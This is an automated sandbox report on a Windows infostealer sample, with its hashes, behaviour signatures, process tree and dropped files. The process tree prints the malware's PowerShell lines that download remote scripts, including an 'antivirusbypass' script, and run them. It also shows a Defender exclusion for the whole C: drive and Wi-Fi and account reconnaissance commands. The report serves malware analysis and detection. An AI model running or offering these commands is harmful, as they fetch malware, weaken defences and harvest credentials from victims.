Analysis

  • max time kernel
    136s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/08/2024, 04:27

General

  • Target

    2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe

  • Size

    14.0MB

  • MD5

    6306c8b9dd7f426c94b26bfe3c8eea0a

  • SHA1

    f2677719e81f9aa8c893552605d077c6462867b8

  • SHA256

    9e3540f2a70e61ea94d7c79f7b18a242014647693e802d55b0beeca7eee2bcb9

  • SHA512

    34689c6c5740d3cb4a73c31b35c7caa0a212f95fc24beae4019a045e28334d8bcb82f9a71c5bb3b5ce147592a4dc9309aedfe82cb8e0221d24256c2809f5674d

  • SSDEEP

    196608:ZjVyhpZ9CKRxcoPqJvAcfYmqQoYiPi9S:Zkh3ZRxcoyJ4cfYmnT

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/antivirusbypass.ps1

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4908
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3112
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aqjq0dh4\aqjq0dh4.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1388
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8C1.tmp" "c:\Users\Admin\AppData\Local\Temp\aqjq0dh4\CSC32F7FA706BA342FC8B8A58409BEEC249.TMP"
          4⤵
            PID:1096
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan show profiles
          3⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:2640
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" localgroup administrators
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4388
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            4⤵
              PID:2500
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
            3⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:4776
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /all
            3⤵
              PID:1168
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2348
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:2236
              • C:\Windows\system32\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /displaydns
                3⤵
                • Gathers network information
                PID:4844
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1520
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup
                  4⤵
                    PID:1992
                • C:\Windows\System32\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                  3⤵
                    PID:3236
                  • C:\Windows\system32\NETSTAT.EXE
                    "C:\Windows\system32\NETSTAT.EXE" -ano
                    3⤵
                    • System Network Connections Discovery
                    • Gathers network information
                    PID:3656
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                    3⤵
                      PID:976
                    • C:\Windows\system32\ipconfig.exe
                      "C:\Windows\system32\ipconfig.exe" /all
                      3⤵
                      • Gathers network information
                      PID:2792
                    • C:\Windows\system32\ROUTE.EXE
                      "C:\Windows\system32\ROUTE.EXE" print
                      3⤵
                        PID:5016
                      • C:\Windows\system32\ARP.EXE
                        "C:\Windows\system32\ARP.EXE" -a
                        3⤵
                        • Network Service Discovery
                        PID:4740
                      • C:\Windows\system32\netsh.exe
                        "C:\Windows\system32\netsh.exe" wlan show profile
                        3⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:4304
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -exec bypass -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/antivirusbypass.ps1')"
                      2⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:540
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xrr40alp\xrr40alp.cmdline"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4664
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB882.tmp" "c:\Users\Admin\AppData\Local\Temp\xrr40alp\CSCD9452996B36F4B7B99B5DEF928F07273.TMP"
                          4⤵
                            PID:4116
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -C "Add-MpPreference -ExclusionPath 'C:'"
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:516
                      • C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
                        PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3420
                      • C:\Windows\system32\cmd.exe
                        cmd /c rundll32.exe user32.dll,SwapMouseButton
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1872
                        • C:\Windows\system32\rundll32.exe
                          rundll32.exe user32.dll,SwapMouseButton
                          3⤵
                            PID:4532
                        • C:\Windows\system32\cmd.exe
                          cmd.exe /c start facebook.com
                          2⤵
                            PID:2232
                          • C:\Windows\system32\attrib.exe
                            attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
                            2⤵
                            • Views/modifies file attributes
                            PID:3612
                          • C:\Windows\system32\taskkill.exe
                            taskkill /F /IM wallpaper32.exe
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2588
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
                            2⤵
                            • Blocklisted process makes network request
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:3232
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gtcvzijr\gtcvzijr.cmdline"
                              3⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1600
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2B4.tmp" "c:\Users\Admin\AppData\Local\Temp\gtcvzijr\CSCB63CF249BEA34E0391207E6455539A8.TMP"
                                4⤵
                                  PID:5100
                          • C:\Windows\system32\AUDIODG.EXE
                            C:\Windows\system32\AUDIODG.EXE 0x360 0x408
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:940

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

                            Filesize

                            2KB

                            MD5

                            d85ba6ff808d9e5444a4b369f5bc2730

                            SHA1

                            31aa9d96590fff6981b315e0b391b575e4c0804a

                            SHA256

                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                            SHA512

                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            360B

                            MD5

                            42a3e507d48a9cb6215ca9938eab61eb

                            SHA1

                            58c18dbd1b4fc1f724093100eebb2b1deba3c42f

                            SHA256

                            7f80bfda515b23fe7c4d67bb7c8513fa8a41bd070f09fd587f1be757a12c1cc2

                            SHA512

                            97ac52563a533a781fc333f1304d5ace76101266ade0b50f6a83e469dc1f2a594fe5c7de317d805d753f18d1263f4dc1f4c9e8dc195a1fce27b75eff87c8aefd

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            1KB

                            MD5

                            cb773d3cb42a8e42796e4777c3b9b3f6

                            SHA1

                            fb55d9b2b33bc0ec2d3412e91c36cb9af69bc90f

                            SHA256

                            3297a9790da3a9dc73c2465e427fc8a3dda387e787f301d2a4b5f99fa8a13da3

                            SHA512

                            b70b769caed999941cc5fdf0b6caaffc9dfe2d8a9afb10d90fec6f016e7ad4362d59ef4c28d2dd870e68f1be6fe1f39ee14ebbdd6427c729873a215846ac61a2

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            1KB

                            MD5

                            b66db53846de4860ca72a3e59b38c544

                            SHA1

                            2202dc88e9cddea92df4f4e8d83930efd98c9c5a

                            SHA256

                            b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

                            SHA512

                            72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

                          • C:\Users\Admin\AppData\Local\Temp\RESB882.tmp

                            Filesize

                            1KB

                            MD5

                            3dfefaa550483a2eb83162c9403f5bed

                            SHA1

                            be4c72f5068441e1262f97a4c5ff1de13aeff648

                            SHA256

                            7487913514749dc14e4af1b1784199e736982eda0f30a8e1ffccd36a9515fc0e

                            SHA512

                            2f3ec45b6ae9f209b0c713e8bca4ee5025cc8d43125cc13b1f17dcd3653485a626c44a1d6331a9a14d2fa386b508809a45b73f8b68fbef4a01f52b5213cbac43

                          • C:\Users\Admin\AppData\Local\Temp\RESB8C1.tmp

                            Filesize

                            1KB

                            MD5

                            212dc419f675b7c890721990c23105cc

                            SHA1

                            39d40e6f76ed80e68207b4c0ff0849082deaafcf

                            SHA256

                            5a4948c7ad5dfce7d90515d0a4138f6910ca28f37251e3665de24d2cfca926dd

                            SHA512

                            016d1a8819c4c727901ed305219a657d6c196f6735e9f31d3a64b87dcfec812fc573b1537143c6971b3e478eba97e9806d489ad9dd4befbc0e012797320cd0c9

                          • C:\Users\Admin\AppData\Local\Temp\RESC2B4.tmp

                            Filesize

                            1KB

                            MD5

                            8518407243ef149d630ad0999189f1f0

                            SHA1

                            745265b6b0e8a8efdec34e73bbd1451554c6e566

                            SHA256

                            a2e924f753b40e592ac9c2b9dfada88aecffb51803c6901c5cff50a187d5a45e

                            SHA512

                            88b52df812828c1591b24ebb0d87909d7ee248f96cdeac91e1d3b337bb2ab52e32d986ae733000d7f63a356ca3269d26b5d55548f6d73e13b8bd952927b70a18

                          • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                            Filesize

                            72KB

                            MD5

                            9a2d58c3604cb1a996f9bba9837c6840

                            SHA1

                            5cac465afa69b4ef49a5b9693307691984e0a4cd

                            SHA256

                            b576a37cfb34d710c438bfb69d4ed8855d460546adddd25921b46f3672e1a74a

                            SHA512

                            d518d89c147380476ed39bf371bef552f5bd5d691a4b10c25da5d0ea8b5195601ee34f038bdb69872f86f328e426dc0144614ad4d461d72cb946fc47ac6f76e1

                          • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                            Filesize

                            24KB

                            MD5

                            8a29e641e8f0a156c169605af78221ad

                            SHA1

                            e09539b9552ecb8e5c20e8dc86334dfc8a38f9e4

                            SHA256

                            9a226f8846bf8cdd52f1fac2d05bbb7e8e4c1e14572f51530b0709de52221c77

                            SHA512

                            570f54233901b413588119ebfbe8809984a3fb2ef9a39ede4986c683c5b6bab6876a0c97cdcd2e010c64fc6c1943148b0551ccd0ba1536fb00ae453162c93136

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wsqbigeo.lab.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • C:\Users\Admin\AppData\Local\Temp\aqjq0dh4\aqjq0dh4.dll

                            Filesize

                            4KB

                            MD5

                            4b8a293f6f69dcc4ba7bd483f8ddd3c4

                            SHA1

                            e11ed93e925ca07233a4a6591fe4f29232593e2e

                            SHA256

                            a28454ce25ee4445329c10fa67a83e0944862812c6ecec1015612a8a737e289e

                            SHA512

                            f60d12dc9376a33329f31f30d6cd88d9972cce35620689f10735f8b2e7a188b76d32236dd88e72709e9276ee8e2b05d1923af07112f0f3729445b1b2e63a0402

                          • C:\Users\Admin\AppData\Local\Temp\gtcvzijr\gtcvzijr.dll

                            Filesize

                            4KB

                            MD5

                            38e2dbaf8ea97886466086a02aaf2fe3

                            SHA1

                            a6bebdb7ab24e76a4886d7053a02b4e254b100f4

                            SHA256

                            022a4bb2ac8537b3fb17008c94fe45af7b60f1caeee0fbf69638bd88bf605f5f

                            SHA512

                            fb750397f117f82499ca8fd914aaaaa320dde2fc96994d4081e87a345b04ee075e9a08fdd010dd45643d8967d4f7428f8c5acdb19903194e9b2940bc9a85d40f

                          • C:\Users\Admin\AppData\Local\Temp\xrr40alp\xrr40alp.dll

                            Filesize

                            4KB

                            MD5

                            dc0833b381e34e08e6ce0781d5d1d915

                            SHA1

                            22ad273c945616919f64633e3148c7d4cc41c343

                            SHA256

                            ec44e8eb6af714a72d2e870bb2be428125b986e4b176c6dbb6634c0941befad1

                            SHA512

                            eba0aa675da7bd99ee65889736cc2d7e2f6e981cf3861b0ce86a465c06cb42589d33ababe2c8d546c2c78472e764913c0cc6e291173fd6b044508cb5d3a046bd

                          • C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                            Filesize

                            2KB

                            MD5

                            9758656bbe8589c66bb241b052490c72

                            SHA1

                            b73da83fb3ae6b86c6365769a04de9845d5c602c

                            SHA256

                            e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

                            SHA512

                            da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

                          • \??\c:\Users\Admin\AppData\Local\Temp\aqjq0dh4\CSC32F7FA706BA342FC8B8A58409BEEC249.TMP

                            Filesize

                            652B

                            MD5

                            0603d7c3aa7b09780367c8424256509c

                            SHA1

                            741dd50c347703a237bb7fdec23cf88773be7ae2

                            SHA256

                            e9e9da29a7600a8bc8e87a1285ce6d79bf3462dbf3afc7bf8ad3d8f28164a8c3

                            SHA512

                            47eab6f5bd048fd6860184405f40d0b91f6c37d87cbf0becce8f3ffef06392d4414d19e2c079142010f1888ead0a38b5e8d5513453a9c46e9dded2bc42cbd202

                          • \??\c:\Users\Admin\AppData\Local\Temp\aqjq0dh4\aqjq0dh4.cmdline

                            Filesize

                            369B

                            MD5

                            156c3f0e87cae2243a3acadb43e7a953

                            SHA1

                            7b37ddef654fc06871f849ddea9454459fc924f6

                            SHA256

                            aab4e17cd43f7fe7df118765f4c19171e20b551318f68b3be31ad3e562805745

                            SHA512

                            e0abe4af71c6ddad14122f3e3a1132a176d91eedf86019dcb863968547c730893206c19c0e340b58048fae27a9d9c25ef0614dd7f0b1d29cf1091f4c2562d036

                          • \??\c:\Users\Admin\AppData\Local\Temp\gtcvzijr\CSCB63CF249BEA34E0391207E6455539A8.TMP

                            Filesize

                            652B

                            MD5

                            138fef6a49040c20aa2e3f987bac40a8

                            SHA1

                            65b48329b6da7ad8b48211e7d5003a66b1bd1572

                            SHA256

                            28c45d6ae400a84c76295cde4fb6990a2003f3fc6f7424603e37b83edd087bd2

                            SHA512

                            573efb53f867c44963f495252d509c5e0c5a47e1ead395bd0845700f7d711799581a2f62821b1192d0e10e092d08106c1f4081cf12e985d9beff1681121c2e22

                          • \??\c:\Users\Admin\AppData\Local\Temp\gtcvzijr\gtcvzijr.cmdline

                            Filesize

                            369B

                            MD5

                            f4ec44b1e0416522e893656f4211dd85

                            SHA1

                            21fa73d2c47c8873bb7d36ee92da430ec8932692

                            SHA256

                            33740df0d38fae04117de2d0c2674ffdd4514d1f1d2cc758936d5aba324aeb19

                            SHA512

                            9bcca84082919838c7b17fde5df8b85349d055efbbc40ba14b5f39c833f38f9883d52427ad2107a81a8dda7f6456be72b4f8ae6307697548cb203e6b6669be87

                          • \??\c:\Users\Admin\AppData\Local\Temp\xrr40alp\CSCD9452996B36F4B7B99B5DEF928F07273.TMP

                            Filesize

                            652B

                            MD5

                            03aa63ac01dcc0d4064dcb739854c5eb

                            SHA1

                            1249475a980712e0ecea2835ca705fd815b5c0c3

                            SHA256

                            ce618cb9a317a0677667cc08ec1a4d02f033fe26bb7ef0314b30153ee0ee9e29

                            SHA512

                            2c6183995c61a727ef571dc5c5403270c7fc4ba2d12a46fcc9ae35806b8a106ad6c7a04652a0692506f1cae8e7a54bbbdbeff6f82db02d1152a9c6da4cd50825

                          • \??\c:\Users\Admin\AppData\Local\Temp\xrr40alp\xrr40alp.0.cs

                            Filesize

                            1KB

                            MD5

                            8a1e7edb2117ec5dde9a07016905923b

                            SHA1

                            0155dbeeb16333e2eaa767b0209750efee56f47f

                            SHA256

                            c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                            SHA512

                            4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                          • \??\c:\Users\Admin\AppData\Local\Temp\xrr40alp\xrr40alp.cmdline

                            Filesize

                            369B

                            MD5

                            901529e410f56056b087c902be3e28b4

                            SHA1

                            983d24144434a734ffd3da1f1a8fe326fee4d7ad

                            SHA256

                            6ad490659f82e8a4539dee23220bbbc1c2a27903853a4a6863170db4d3fdeec3

                            SHA512

                            f8214328f29e404e1ad6d327a345a5b5f2784bcb58612d5b6d39abef7fe42e6d2cd750696c4ea338a36f05a8a3aa1e3a95235384f8e5a09d280a8a5a32fe1e33

                          • memory/516-35-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/516-83-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/516-32-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/516-34-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/540-96-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/540-0-0x00007FFE8FA03000-0x00007FFE8FA05000-memory.dmp

                            Filesize

                            8KB

                          • memory/540-81-0x000001D8D4300000-0x000001D8D4308000-memory.dmp

                            Filesize

                            32KB

                          • memory/540-21-0x000001D8D4310000-0x000001D8D4332000-memory.dmp

                            Filesize

                            136KB

                          • memory/540-11-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/540-1-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3112-98-0x000002572B0F0000-0x000002572B114000-memory.dmp

                            Filesize

                            144KB

                          • memory/3112-97-0x000002572B0F0000-0x000002572B11A000-memory.dmp

                            Filesize

                            168KB

                          • memory/3112-84-0x000002572B680000-0x000002572BE26000-memory.dmp

                            Filesize

                            7.6MB

                          • memory/3112-78-0x000002572AAE0000-0x000002572AAE8000-memory.dmp

                            Filesize

                            32KB

                          • memory/3112-155-0x000002572B0F0000-0x000002572B102000-memory.dmp

                            Filesize

                            72KB

                          • memory/3112-156-0x000002572B0E0000-0x000002572B0EA000-memory.dmp

                            Filesize

                            40KB

                          • memory/3232-126-0x000001FF30130000-0x000001FF30138000-memory.dmp

                            Filesize

                            32KB